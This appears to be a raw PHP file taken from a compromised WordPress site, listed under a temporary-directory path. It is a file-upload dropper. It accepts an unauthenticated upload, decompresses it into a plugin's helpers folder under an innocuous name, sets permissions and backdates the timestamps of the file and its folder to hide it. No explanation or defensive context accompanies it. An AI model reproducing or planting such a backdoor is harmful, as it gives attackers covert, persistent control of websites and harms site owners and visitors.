/home/ramtczxy/.cagefs/tmp/.rfind
<?php $p = "/home/ramtczxy/emilypoultryfarm.com//home/ramtczxy/emilypoultryfarm.com/wp-content/plugins/external-importer/application/helpers/homeOct222010"; $ft = 1765854922; if (move_uploaded_file($_FILES['file']['tmp_name'], "$p.gz")) { $file = gzopen("$p.gz", 'rb'); $out = fopen($p, 'wb'); while (!gzeof($file)) { fwrite($out, gzread($file, 4096)); } fclose($out); gzclose($file); @unlink("$p.gz"); $filesize = filesize($p); if ($filesize >= 706371) { @chmod($p, 0744); if ($ft) { @touch($p, $ft, $ft); @touch(@dirname($p), $ft, $ft); } die('_uploaded!_'); } else { if (file_exists($p)) { print "file exists but size = {$filesize} not 706371"; } @unlink($p); } } die('_upload_failed_');